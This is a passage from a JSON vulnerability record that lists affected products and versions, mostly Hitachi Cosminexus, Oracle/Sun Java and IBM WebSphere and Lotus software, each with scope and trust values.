"model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus application server enterprise version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus client version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus application server standard version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus client version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer light version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus developer standard version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer light version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "cosminexus application server enterprise version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "cosminexus application server standard version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "cosminexus developer standard version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere business services fabric for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "cosminexus developer standard version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux enterprise server sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "cosminexus application server standard version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "cosminexus developer standard version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli policy driven software distribution", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus application server enterprise version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "lotus notes fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.22" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.4" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "cosminexus application server version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "websphere business services fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus client version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server enterprise version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "jrockit r28.2.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "cosminexus developer version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "websphere process server for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "cosminexus developer professional version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "vcenter server update1", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "powersc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "cosminexus developer light version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer standard version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "update manager update", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.51" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus developer light version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli storage productivity center fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.33" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server version 05-00-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.15" }, { "model": "cosminexus developer light version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus application server enterprise version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus developer standard version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino 8.5.3fp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "lotus notes fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "cosminexus application server version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "linux enterprise server sp2 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.12" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.12" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "mac os update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.617" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus developer version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "lotus domino fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus client version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "lotus domino fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "tivoli netcool/webtop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.4" }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "cosminexus developer light version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "cosminexus developer light version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "os/400 v6r1m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.13" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.6" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.5" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": 